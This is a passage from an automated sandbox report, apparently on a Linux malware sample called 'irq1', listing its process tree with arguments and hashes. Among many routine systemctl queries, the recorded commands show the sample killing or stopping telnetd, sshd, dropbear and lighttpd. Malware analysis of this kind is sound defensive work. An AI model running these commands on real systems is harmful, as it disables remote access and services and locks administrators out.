    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7813 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmpolld.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7840 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7840 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lxd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7865 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7865 Parent PID: 7380

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show saned.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7894 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7894 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show snapd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7903 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7903 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show ssh.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7940 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7940 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show syslog.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7975 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7975 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-bus-proxyd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8010 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8010 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-fsckd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8037 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8037 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-initctl.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8061 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8061 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-audit.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8091 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8091 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-dev-log.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8118 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8118 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8127 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8127 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-networkd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8172 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8172 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-rfkill.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8175 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8175 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-control.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8245 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8245 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-kernel.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8263 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8263 Parent PID: 7380

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show uuidd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: systemctl PID: 7380 Parent PID: 3310

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl stop telnetd.service
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: irq1 PID: 7381 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7381 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "service sshd stop > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7385 Parent PID: 7381

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: service PID: 7385 Parent PID: 7381

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:/bin/sh /usr/sbin/service sshd stop
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 7389 Parent PID: 7385

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 7389 Parent PID: 7385

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 7420 Parent PID: 7385

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 7420 Parent PID: 7385

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 7465 Parent PID: 7385

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7465 Parent PID: 7385

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl --quiet is-active multi-user.target
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7559 Parent PID: 7385

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 7562 Parent PID: 7559

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7562 Parent PID: 7559

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl list-unit-files --full --type=socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7563 Parent PID: 7559

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: sed PID: 7563 Parent PID: 7559

    General

    Start time:05:27:22
    Start date:25/03/2021
    Path:/bin/sed
    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    File size:73424 bytes
    MD5 hash:c1a00c583ba08e728b10f3f46f5776d6

    Analysis Process: service PID: 7614 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7614 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show acpid.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7633 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7633 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show apport-forward.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7668 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7668 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show avahi-daemon.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7695 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7695 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show cups.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7723 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7723 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dbus.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7757 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7757 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dm-event.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7777 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7777 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmetad.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7812 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7812 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmpolld.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7839 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7839 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lxd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7847 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7847 Parent PID: 7385

    General

    Start time:05:27:23
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show saned.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7893 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7893 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show snapd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7897 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7897 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show ssh.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7939 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7939 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show syslog.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7974 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7974 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-bus-proxyd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7983 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7983 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-fsckd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8012 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8012 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-initctl.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8042 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8042 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-audit.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8072 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8072 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-dev-log.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8093 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8093 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8120 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8120 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-networkd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8162 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8162 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-rfkill.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8174 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8174 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-control.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8198 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8198 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-kernel.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 8246 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 8246 Parent PID: 7385

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show uuidd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: systemctl PID: 7385 Parent PID: 3310

    General

    Start time:05:27:24
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl stop sshd.service
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: irq1 PID: 7391 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7391 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 telnetd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7432 Parent PID: 7391

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 7432 Parent PID: 7391

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 telnetd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq1 PID: 7435 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7435 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7491 Parent PID: 7435

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 7491 Parent PID: 7435

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 utelnetd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq1 PID: 7492 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7492 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 dropbear > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7510 Parent PID: 7492

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 7510 Parent PID: 7492

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 dropbear
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq1 PID: 7511 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7511 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 sshd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7526 Parent PID: 7511

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 7526 Parent PID: 3310

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 sshd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq1 PID: 7527 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 7527 Parent PID: 6305

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 7546 Parent PID: 7527

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 7546 Parent PID: 7527

    General

    Start time:05:27:21
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 lighttpd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq1 PID: 8407 Parent PID: 6305

    General

    Start time:05:30:08
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 8433 Parent PID: 8407

    General

    Start time:05:30:08
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 8433 Parent PID: 8407

    General

    Start time:05:30:08
    Start date:25/03/2021
    Path:/bin/sh
